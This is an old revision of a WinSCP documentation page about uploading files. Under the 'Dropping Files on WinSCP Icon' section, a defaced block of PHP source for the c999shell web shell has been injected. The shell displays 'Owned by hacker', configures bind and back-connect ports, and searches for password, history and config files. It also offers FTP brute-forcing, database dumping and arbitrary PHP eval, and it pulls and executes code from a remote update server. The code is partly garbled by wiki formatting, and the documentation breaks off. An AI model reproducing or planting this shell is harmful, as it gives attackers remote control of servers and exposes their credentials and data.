This is an old revision of the document!
Uploading Files
This article contains detailed description of uploading files. You may want to see simplified guide to the process instead.
- Using Drag&drop (Mouse)
- Using Keyboard
- Using Copy&paste
- Using Windows Explorer’s ‘Send To’ Context Menu
- Dropping Files on WinSCP Icon
- Preserving Overwritten Remote Files
- Automating Upload
- Upload/Download Buttons
- Uploading Files From UNC Paths (Network shares)
Using Drag&drop (Mouse)
First select the local files or directories you want to upload. You can select the files in the Windows Explorer or other application. If you are using Commander interface, you can also select the files in its local panel.
Then drag your selection and drop it on the remote panel. If you drop the files on empty place on file list, the files will be uploaded to current remote directory. If you drop the files on remote directory icon (either in the file list or directory tree), the files will be uploaded to that directory.
Before the upload actually starts, the transfer options dialog will show. There you will have a chance to change the transfer options or the target directory. You can avoid the dialog being shown in preferences. In such case you can change the transfer options by selecting preset on Transfer Settings toolbar.
Using Keyboard
If you prefer controlling application using keyboard, you will probably find Commander interface useful. Otherwise, you must use copy&paste method.
First select the local files or directories you want to upload (learn how to select files using keyboard). Make sure that local panel is still active and use command Files > Copy (or press F5 key).
Before the upload actually starts, the transfer options dialog will show. There you will have a chance to change the transfer options or the target directory. The target directory is by default the current remote directory. You can avoid the dialog being shown in preferences. In such case you can change the transfer options by selecting preset on Transfer Settings toolbar.
Using Copy&paste
If you prefer the Explorer interface, but still want to control it using keyboard, you need to use copy&paste method.
First select the files you want to upload in Windows Explorer or other application and copy them to clipboard.
Then switch to WinSCP and use command File(s) > Paste (or Ctrl+V).
Before the upload actually starts, the transfer options dialog will show. There you will have a chance to change the transfer options or the target directory. The target directory is by default the current remote directory.
Note that if clipboard contains plain text string only (no file data), the function File(s) > Paste opens the path stored in clipboard instead of pasting files.
Dropping Files on WinSCP Icon
Files dropped on WinSCP icon associated with stored session will be uploaded.
<?php Starting calls if (!function_exists(“getmicrotime”)) {function getmicrotime() {list($usec, $sec) = explode(“ ”, microtime()); return1 “win”; define(“starttime”,getmicrotime()); if (get_magic_quotes_gpc()) {if (!function_exists(“strips”)) {function strips(&$arr,$k=“") {if (is_array($arr)) {foreach($arr as $k⇒$v) {if (strtoupper($k) != ”GLOBALS“) {strips($arr[”$k“]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); foreach($_REQUEST as $k⇒$v) {if (!isset($$k)) {$$k = $v;}}
$shver = ”1.0 pre-release build #16“; Current version CONFIGURATION AND SETTINGS if (!empty($unset_surl)) {setcookie(”c999sh_surl“); $surl = ”“;} elseif (!empty($set_surl)) {$surl = $set_surl; setcookie(”c999sh_surl“,$surl);} else {$surl = $_REQUEST[”c999sh_surl“]; Set this cookie for manual SURL }
$surl_autofill_include = TRUE; If TRUE then search variables with descriptors (URLs) and save it in SURL.
if ($surl_autofill_include and !$_REQUEST[”c999sh_surl“]) {$include = ”&“; foreach (explode(”&“,getenv(”QUERY_STRING“)) as $v) {$v = explode(”=“,$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array(”http:“,”https:“,”ssl:“,”ftp:“,”\\\\“) as $needle) {if (strpos($value,$needle) = 0) {$includestr .= urlencode($name).”=“.urlencode($value).”&“;}}} if ($_REQUEST[”surl_autofill_include“]) {$includestr .= ”surl_autofill_include=1&“;}} if (empty($surl)) { $surl = ”?“.$includestr; Self url } $surl = htmlspecialchars($surl);
$timelimit = 0; time limit of execution this script over server quote (seconds), 0 = unlimited. Authentication $login = ”“; login DON’T FORGOT ABOUT PASSWORD!!! $pass = ”“; password $md5_pass = ”“; md5-cryped pass. if null, md5($pass) $host_allow = array(”*“); array (”{mask}1“,”{mask}2“,…), {mask} = IP or HOST e.g. array(”192.168.0.*“,”127.0.0.1“) $login_txt = ”Restricted area“; http-auth message. $accessdeniedmess = ”<a href=\“http://ccteam.ru/releases/c999shell\”>c999shell v.“.$shver.”</a>: access denied“; $gzipencode = TRUE; Encode with gzip? $updatenow = FALSE; If TRUE, update now (this variable will be FALSE) $ax4 =”http:“; $c999sh_updateurl = ”http://ccteam.ru/update/c999shell/“; Update server $c999sh_sourcesurl = ”http://ccteam.ru/files/c999sh_sources/“; Sources-server $filestealth = TRUE; if TRUE, don’t change modify- and access-time $donated_html = ”<center><b>Owned by hacker</b></center>“; /* If you publish free shell and you wish add link to your site or any other information, put here your html. */ $donated_act = array(”“); array (”act1“,”act2,“…), if $act is in this array, display $donated_html. $curdir = ”./“; start folder $curdir = getenv(”DOCUMENT_ROOT“); $tmpdir = ”“; Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) $tmpdir_log = ”./“; Directory logs of long processes (e.g. brute, scan…)
$log_email = ”user@host.tld“; Default e-mail for sending logs
$sort_default = ”0a“; Default sorting, 0 - number of colomn, ”a“scending or ”d“escending $sort_save = TRUE; If TRUE then save sorting-position using cookies.
Registered file-types. array( ”{action1}“⇒array(”ext1“,”ext2“,”ext3“,…), ”{action2}“⇒array(”ext4“,”ext5“,”ext6“,…), … ) $ftypes = array( ”html“⇒array(”html“,”htm“,”shtml“), ”txt“⇒array(”txt“,”conf“,”bat“,”sh“,”js“,”bak“,”doc“,”log“,”sfc“,”cfg“,”htaccess“), ”exe“⇒array(”sh“,”install“,”bat“,”cmd“), ”ini“⇒array(”ini“,”inf“), ”code“⇒array(”php“,”phtml“,”php3“,”php4“,”inc“,”tcl“,”h“,”c“,”cpp“,”py“,”cgi“,”pl“), ”img“⇒array(”gif“,”png“,”jpeg“,”jfif“,”jpg“,”jpe“,”bmp“,”ico“,”tif“,”tiff“,”avi“,”mpg“,”mpeg“), ”sdb“⇒array(”sdb“), ”phpsess“⇒array(”sess“), ”download“⇒array(”exe“,”com“,”pif“,”src“,”lnk“,”zip“,”rar“,”gz“,”tar“) );
Registered executable file-types. array( string ”command{i}“⇒array(”ext1“,”ext2“,”ext3“,…), … ) {command}: %f% = filename $exeftypes = array( getenv(”PHPRC“).” -q %f%“ ⇒ array(”php“,”php3“,”php4“), ”perl %f%“ ⇒ array(”pl“,”cgi“) );
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{break})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default), 1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if TRUE and found match then break
*/ $regxp_highlight = array(
array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
array("config.php",1) // example
);
$safemode_diskettes = array(”a“); This variable for disabling diskett-errors. array (i⇒{letter} …); string {letter} - letter of a drive $safemode_diskettes = range(”a“,”z“); $hexdump_lines = 8; lines in hex preview file $hexdump_rows = 24; 16, 24 or 32 bytes in one line $cx7 =”.com“; $nixpwdperpage = 100; Get first N lines from /etc/passwd
$bindport_pass = ”c999“; default password for binding $bindport_port = ”31373“; default port for binding $bc_port = ”31373“; default port for back-connect $cx4 =”/x.“; $datapipe_localport = ”8081“; default port for datapipe
Command-aliases if (!$win) { $cmdaliases = array(
array("-----------------------------------------------------------", "ls -la"),
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name \"config*\""),
array("find config* files in current dir", "find . -type f -name \"config*\""),
array("find all writable folders and files", "find / -perm -2 -ls"),
array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("list file attributes on a Linux second extended file system", "lsattr -va"),
array("show opened ports", "netstat -an | grep -i listen")
); } else { $cmdaliases = array(
array("-----------------------------------------------------------", "dir"),
array("show opened ports", "netstat -an")
); }
$sess_cookie = ”c999shvars“; Cookie-variable name
$usefsbuff = TRUE; Buffer-function $px7 =”html“; $copy_unset = FALSE; Remove copied files from buffer after pasting
Quick launch $quicklaunch = array( array(”<img src=\“".$surl.”act=img&img=home\“ alt=\”Home\“ height=\”20\“ width=\”20\“ border=\”0\“>”,$surl), array(“<img src=\”“.$surl.”act=img&img=back\“ alt=\”Back\“ height=\”20\“ width=\”20\“ border=\”0\“>”,“#\” onclick=\“history.back(1)”), array(“<img src=\”“.$surl.”act=img&img=forward\“ alt=\”Forward\“ height=\”20\“ width=\”20\“ border=\”0\“>”,“#\” onclick=\“history.go(1)”), array(“<img src=\”“.$surl.”act=img&img=up\“ alt=\”UPDIR\“ height=\”20\“ width=\”20\“ border=\”0\“>”,$surl.“act=ls&d=%upd&sort=%sort”), array(“<img src=\”“.$surl.”act=img&img=refresh\“ alt=\”Refresh\“ height=\”20\“ width=\”17\“ border=\”0\“>”,“"), array(”<img src=\“".$surl.”act=img&img=search\“ alt=\”Search\“ height=\”20\“ width=\”20\“ border=\”0\“>”,$surl.“act=search&d=%d”), array(“<img src=\”“.$surl.”act=img&img=buffer\“ alt=\”Buffer\“ height=\”20\“ width=\”20\“ border=\”0\“>”,$surl.“act=fsbuff&d=%d”), array(“<b>Encoder</b>”,$surl.“act=encoder&d=%d”), array(“<b>Tools</b>”,$surl.“act=tools&d=%d”), array(“<b>Proc.</b>”,$surl.“act=processes&d=%d”), array(“<b>FTP brute</b>”,$surl.“act=ftpquickbrute&d=%d”), array(“<b>Sec.</b>”,$surl.“act=security&d=%d”), array(“<b>SQL</b>”,$surl.“act=sql&d=%d”), array(“<b>PHP-code</b>”,$surl.“act=eval&d=%d”), array(“<b>Update</b>”,$surl.“act=update&d=%d”), array(“<b>Feedback</b>”,$surl.“act=feedback&d=%d”), array(“<b>Self remove</b>”,$surl.“act=selfremove”), array(“<b>Logout</b>”,“#\” onclick=\“if (confirm(’Are you sure?’)) window.close()”) );
Highlight-code colors $highlight_background = “#c0c0c0”; $highlight_bg = “#FFFFFF”; $highlight_comment = “#6A6A6A”; $highlight_default = “#0000BB”; $highlight_html = “#1300FF”; $highlight_keyword = “#007700”; $highlight_string = “#000000”;
@$f = $_REQUEST[“f”]; @extract($_REQUEST[“c999shcook”]);
END CONFIGURATION
\/Next code isn’t for editing\/ @set_time_limit(0); $tmp = array(); foreach($host_allow as $k⇒$v) {$tmp[] = str_replace(“\\*”,“.*”,preg_quote($v));} $s = “!^(”.implode(“|”,$tmp).“)$!i”; if (!preg_match($s,getenv(“REMOTE_ADDR”)) and !preg_match($s,gethostbyaddr(getenv(“REMOTE_ADDR”)))) {exit(“<a href=\”http://ccteam.ru/releases/cc999shell\“>c999shell</a>: Access Denied - your host (”.getenv(“REMOTE_ADDR”).“) not allow”);} if (!empty($login)) { if (empty($md5_pass)) {$md5_pass = md5($pass);} if2 {
if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |<br>"," ",$donated_html));}
header("WWW-Authenticate: Basic realm=\"c999shell ".$shver.": ".$login_txt."\"");
header("HTTP/1.0 401 Unauthorized");
exit($accessdeniedmess);
} } if ($act != “img”) { $lastdir = realpath(“.”); chdir($curdir); if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;} $sess_data = unserialize($_COOKIE[“$sess_cookie”]); if (!is_array($sess_data)) {$sess_data = array();} if (!is_array($sess_data[“copy”])) {$sess_data[“copy”] = array();} if (!is_array($sess_data[“cut”])) {$sess_data[“cut”] = array();}
$disablefunc = @ini_get(“disable_functions”); if (!empty($disablefunc)) { $disablefunc = str_replace(“ ”,“",$disablefunc); $disablefunc = explode(”,“,$disablefunc); }
if (!function_exists(”c999_buff_prepare“)) { function c999_buff_prepare() { global $sess_data; global $act; foreach($sess_data[”copy“] as $k⇒$v) {$sess_data[”copy“][$k] = str_replace(”\\“,DIRECTORY_SEPARATOR,realpath($v));} foreach($sess_data[”cut“] as $k⇒$v) {$sess_data[”cut“][$k] = str_replace(”\\“,DIRECTORY_SEPARATOR,realpath($v));} $sess_data[”copy“] = array_unique($sess_data[”copy“]); $sess_data[”cut“] = array_unique($sess_data[”cut“]); sort($sess_data[”copy“]); sort($sess_data[”cut“]); if ($act != ”copy“) {foreach($sess_data[”cut“] as $k⇒$v) {if ($sess_data[”copy“][$k] $v) {unset($sess_data[”copy“][$k]); }}} else {foreach($sess_data[”copy“] as $k⇒$v) {if ($sess_data[”cut“][$k] $v) {unset($sess_data[”cut“][$k]);}}} } } c999_buff_prepare(); if (!function_exists(”c999_sess_put“)) { function c999_sess_put($data) { global $sess_cookie; global $sess_data; c999_buff_prepare(); $sess_data = $data; $data = serialize($data); setcookie($sess_cookie,$data); } } foreach (array(”sort“,”sql_sort“) as $v) { if (!empty($_GET[$v])) {$$v = $_GET[$v];} if (!empty($_POST[$v])) {$$v = $_POST[$v];} } if ($sort_save) { if (!empty($sort)) {setcookie(”sort“,$sort);} if (!empty($sql_sort)) {setcookie(”sql_sort“,$sql_sort);} } if (!function_exists(”str2mini“)) { function str2mini($content,$len) { if (strlen($content) > $len) {
$len = ceil($len/2) - 2; return substr($content, 0,$len)."...".substr($content,-$len);
} else {return $content;} } } if (!function_exists(”view_size“)) { function view_size($size) { if (!is_numeric($size)) {return FALSE;} else {
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
} } } if (!function_exists(”fs_copy_dir“)) { function fs_copy_dir($d,$t) { $d = str_replace(”\\“,DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while3 ! FALSE) {
if (($o != ".") and ($o != ".."))
{
if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
if (!$ret) {return $ret;}
}
} closedir($h); return TRUE; } } if (!function_exists(”fs_copy_obj“)) { function fs_copy_obj($d,$t) { $d = str_replace(”\\“,DIRECTORY_SEPARATOR,$d); $t = str_replace(”\\“,DIRECTORY_SEPARATOR,$t); if (!is_dir(dirname($t))) {mkdir(dirname($t));} if (is_dir($d)) {
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
return fs_copy_dir($d,$t);
} elseif (is_file($d)) {return copy($d,$t);} else {return FALSE;} } } if (!function_exists(”fs_move_dir“)) { function fs_move_dir($d,$t) { $h = opendir($d); if (!is_dir($t)) {mkdir($t);} while3 ! FALSE) {
if (($o != ".") and ($o != ".."))
{
$ret = TRUE;
if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
if (!$ret) {return $ret;}
}
} closedir($h); return TRUE; } } if (!function_exists(”fs_move_obj“)) { function fs_move_obj($d,$t) { $d = str_replace(”\\“,DIRECTORY_SEPARATOR,$d); $t = str_replace(”\\“,DIRECTORY_SEPARATOR,$t); if (is_dir($d)) {
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
return fs_move_dir($d,$t);
} elseif (is_file($d)) {
if(copy($d,$t)) {return unlink($d);}
else {unlink($t); return FALSE;}
} else {return FALSE;} } } if (!function_exists(”fs_rmdir“)) { function fs_rmdir($d) { $h = opendir($d); while3 ! FALSE) {
if (($o != ".") and ($o != ".."))
{
if (!is_dir($d.$o)) {unlink($d.$o);}
else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
}
} closedir($h); rmdir($d); return !is_dir($d); } } if (!function_exists(”fs_rmobj“)) { function fs_rmobj($o) { $o = str_replace(”\\“,DIRECTORY_SEPARATOR,$o); if (is_dir($o)) {
if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
return fs_rmdir($o);
} elseif (is_file($o)) {return unlink($o);} else {return FALSE;} } } if (!function_exists(”myshellexec“)) { function myshellexec($cmd) { global $disablefunc; $result = ”“; if (!empty($cmd)) {
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
{
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
}
} return $result; } } if (!function_exists(”tabsort“)) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} if (!function_exists(”view_perms“)) { function view_perms($mode) { if4 {function posix_getpwuid($uid) {return FALSE;}} if (!function_exists(”posix_getgrgid“) and !in_array(”posix_getgrgid“,$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} if (!function_exists(”posix_kill“) and !in_array(”posix_kill“,$disablefunc)) {function posix_kill($gid) {return FALSE;}} if (!function_exists(”parse_perms“)) { function parse_perms($mode) { if5 { function parsesort($sort) { $one = intval($sort); $second = substr($sort,-1); if ($second != ”d“) {$second = ”a“;} return array($one,$second); } } if (!function_exists(”view_perms_color“)) { function view_perms_color($o) { if (!is_readable($o)) {return ”<font color=red>“.view_perms(fileperms($o)).”</font>“;} elseif (!is_writable($o)) {return ”<font color=white>“.view_perms(fileperms($o)).”</font>“;} else {return ”<font color=green>“.view_perms(fileperms($o)).”</font>“;} } } if (!function_exists(”c999getsource“)) { function c999getsource($fn) { global $c999sh_sourcesurl; $array = array(
"c999sh_bindport.pl" => "c999sh_bindport_pl.txt", "c999sh_bindport.c" => "c999sh_bindport_c.txt", "c999sh_backconn.pl" => "c999sh_backconn_pl.txt", "c999sh_backconn.c" => "c999sh_backconn_c.txt", "c999sh_datapipe.pl" => "c999sh_datapipe_pl.txt", "c999sh_datapipe.c" => "c999sh_datapipe_c.txt",
); $name = $array[$fn]; if ($name) {return file_get_contents($c999sh_sourcesurl.$name);} else {return FALSE;} } } if (!function_exists(”c999sh_getupdate“)) { function c999sh_getupdate($update = TRUE) { $url = $GLOBALS[”c999sh_updateurl“].”?version=“.urlencode(base64_encode($GLOBALS[”shver“])).”&updatenow=“.($updatenow?”1“:”0“).”&“; $data = @file_get_contents($url); if (!$data) {return ”Can’t connect to update-server!“;} else {
$data = ltrim($data);
$string = substr($data,3,ord($data{2}));
if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
if ($data{0} == "\x99" and $data{1} == "\x03")
{
$string = explode("\x01",$string);
if ($update)
{
$confvars = array();
$sourceurl = $string[0];
$source = file_get_contents($sourceurl);
if (!$source) {return "Can't fetch update!";}
else
{
$fp = fopen(__FILE__,"w");
if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c999shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
}
}
else {return "New version are available: ".$string[1];}
}
elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
else {return "Error in protocol: segmentation failed! (".$data.") ";}
} } } if (!function_exists(”mysql_dump“)) { function mysql_dump($set) { global $shver; $sock = $set[”sock“]; $db = $set[”db“]; $print = $set[”print“]; $nl2br = $set[”nl2br“]; $file = $set[”file“]; $add_drop = $set[”add_drop“]; $tabs = $set[”tabs“]; $onlytabs = $set[”onlytabs“]; $ret = array(); $ret[”err“] = array(); if (!is_resource($sock)) {echo(”Error: \$sock is not valid resource.“);} if (empty($db)) {$db = ”db“;} if (empty($print)) {$print = 0;} if (empty($nl2br)) {$nl2br = 0;} if (empty($add_drop)) {$add_drop = TRUE;} if (empty($file)) {
$file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
} if (!is_array($tabs)) {$tabs = array();} if (empty($add_drop)) {$add_drop = TRUE;} if (sizeof($tabs) 0) {
// retrive tables-list
$res = mysql_query("SHOW TABLES FROM ".$db, $sock);
if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
} $out = ”# Dumped by c999Shell.SQL v. “.$shver.” # Home page: http://ccteam.ru # # Host settings: # MySQL version: (“.mysql_get_server_info().”) running on “.getenv(”SERVER_ADDR“).” (“.getenv(”SERVER_NAME“).”)“.” # Date: “.date(”d.m.Y H:i:s“).” # DB: \“".$db.”\“ #--------------------------------------------------------- ”; $c = count($onlytabs); foreach($tabs as $tab) {
if ((in_array($tab,$onlytabs)) or (!$c))
{
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
// recieve query for create table structure
$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
if (!$res) {$ret["err"][] = mysql_smarterror();}
else
{
$row = mysql_fetch_row($res);
$out .= $row["1"].";\n\n";
// recieve table variables
$res = mysql_query("SELECT * FROM `$tab`", $sock);
if (mysql_num_rows($res) > 0)
{
while ($row = mysql_fetch_assoc($res))
{
$keys = implode("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
$out .= $sql;
}
}
}
}
} $out .= “#---------------------------------------------------------------------------------\n\n”; if ($file) {
$fp = fopen($file, "w");
if (!$fp) {$ret["err"][] = 2;}
else
{
fwrite ($fp, $out);
fclose ($fp);
}
} if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} return $out; } } if (!function_exists(“mysql_buildwhere”)) { function mysql_buildwhere($array,$sep=“ and”,$functs=array()) { if (!is_array($array)) {$array = array();} $result = “"; foreach($array as $k⇒$v) {
$value = "";
if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
$value .= "'".addslashes($v)."'";
if (!empty($functs[$k])) {$value .= ")";}
$result .= "`".$k."` = ".$value.$sep;
} $result = substr($result,0,strlen($result)-strlen($sep)); return $result; } } if (!function_exists(”mysql_fetch_all“)) { function mysql_fetch_all($query,$sock) { if ($sock) {$result = mysql_query($query,$sock);} else {$result = mysql_query($query);} $array = array(); while ($row = mysql_fetch_array($result)) {$array[] = $row;} mysql_free_result($result); return $array; } } if (!function_exists(”mysql_smarterror“)) { function mysql_smarterror($type,$sock) { if ($sock) {$error = mysql_error($sock);} else {$error = mysql_error();} $error = htmlspecialchars($error); return $error; } } if (!function_exists(”mysql_query_form“)) { function mysql_query_form() { global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; if6 {if (!$sql_query_error) {$sql_query_error = ”Query was empty“;} echo ”<b>Error:</b> <br>“.$sql_query_error.”<br>“;} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if7 {
echo "<table border=0><tr><td><form name=\"c999sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
if ($tbl_struct)
{
echo "<td valign=\"top\"><b>Fields:</b><br>";
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c999sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
echo "</td></tr></table>";
}
} if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} } } if (!function_exists(”mysql_create_db“)) { function mysql_create_db($db,$sock=”“) { $sql = ”CREATE DATABASE `“.addslashes($db).”`;“; if ($sock) {return mysql_query($sql,$sock);} else {return mysql_query($sql);} } } if (!function_exists(”mysql_query_parse“)) { function mysql_query_parse($query) { $query = trim($query); $arr = explode (” “,$query); /*array array() {
"METHOD"=>array(output_type), "METHOD1"... ...
} if output_type 0, no output, if output_type 1, no output if no error if output_type 3, output with control-buttons */ $types = array(
"SELECT"=>array(3,1), "SHOW"=>array(2,1), "DELETE"=>array(1), "DROP"=>array(1)
); $result = array(); $op = strtoupper($arr[0]); if (is_array($types[$op])) {
$result["propertions"] = $types[$op];
$result["query"] = $query;
if ($types[$op] == 2)
{
foreach($arr as $k=>$v)
{
if (strtoupper($v) == "LIMIT")
{
$result["limit"] = $arr[$k+1];
$result["limit"] = explode(",",$result["limit"]);
if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
unset($arr[$k],$arr[$k+1]);
}
}
}
} else {return FALSE;} } } if (!function_exists(”c999fsearch“)) { function c999fsearch($d) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while8 ! FALSE) {
if($f != "." && $f != "..")
{
$bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
if (is_dir($d.$f))
{
$search_i_d++;
if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
if (!is_link($d.$f)) {c999fsearch($d.$f);}
}
else
{
$search_i_f++;
if ($bool)
{
if (!empty($a["text"]))
{
$r = @file_get_contents($d.$f);
if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
else {$bool = strpos(" ".$r,$a["text"],1);}
if ($a["text_not"]) {$bool = !$bool;}
if ($bool) {$found[] = $d.$f; $found_f++;}
}
else {$found[] = $d.$f; $found_f++;}
}
}
}
} closedir($h); } } if ($act ”gofile“) {if (is_dir($f)) {$act = ”ls“; $d = $f;} else {$act = ”f“; $d = dirname($f); $f = basename($f);}} Sending headers @ob_start(); @ob_implicit_flush(0); function onphpshutdown() { global $gzipencode,$ft; if (!headers_sent() and $gzipencode and !in_array($ft,array(”img“,”download“,”notepad“))) {
$v = @ob_get_contents();
@ob_end_clean();
@ob_start("ob_gzHandler");
echo $v;
@ob_end_flush();
} } function c999shexit() { onphpshutdown(); exit; } header(”Expires: Mon, 26 Jul 1997 05:00:00 GMT“); header(”Last-Modified: “.gmdate(”D, d M Y H:i:s“).” GMT“); header(”Cache-Control: no-store, no-cache, must-revalidate“); header(”Cache-Control: post-check=0, pre-check=0“, FALSE); header(”Pragma: no-cache“); if (empty($tmpdir)) { $tmpdir = ini_get(”upload_tmp_dir“); if (is_dir($tmpdir)) {$tmpdir = ”/tmp/“;} } $tmpdir = realpath($tmpdir); $tmpdir = str_replace(”\\“,DIRECTORY_SEPARATOR,$tmpdir); if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} else {$tmpdir_logs = realpath($tmpdir_logs);} if (@ini_get(”safe_mode“) or strtolower(@ini_get(”safe_mode“)) ”on“) { $safemode = TRUE; $hsafemode = ”<font color=red>ON (secure)</font>“; } else {$safemode = FALSE; $hsafemode = ”<font color=green>OFF (not secure)</font>“;} $v = @ini_get(”open_basedir“); if ($v or strtolower($v) ”on“) {$openbasedir = TRUE; $hopenbasedir = ”<font color=red>“.$v.”</font>“;} else {$openbasedir = FALSE; $hopenbasedir = ”<font color=green>OFF (not secure)</font>“;} $sort = htmlspecialchars($sort); if (empty($sort)) {$sort = $sort_default;} $sort[1] = strtolower($sort[1]); $DISP_SERVER_SOFTWARE = getenv(”SERVER_SOFTWARE“); if (!ereg(”PHP/“.phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ”. PHP/“.phpversion();} $DISP_SERVER_SOFTWARE = str_replace(”PHP/“.phpversion(),”<a href=\“".$surl.”act=phpinfo\“ target=\”_blank\“><b><u>PHP/”.phpversion().“</u></b></a>”,htmlspecialchars($DISP_SERVER_SOFTWARE)); @ini_set(“highlight.bg”,$highlight_bg); FFFFFF @ini_set(“highlight.comment”,$highlight_comment); #FF8000 @ini_set(“highlight.default”,$highlight_default); #0000BB 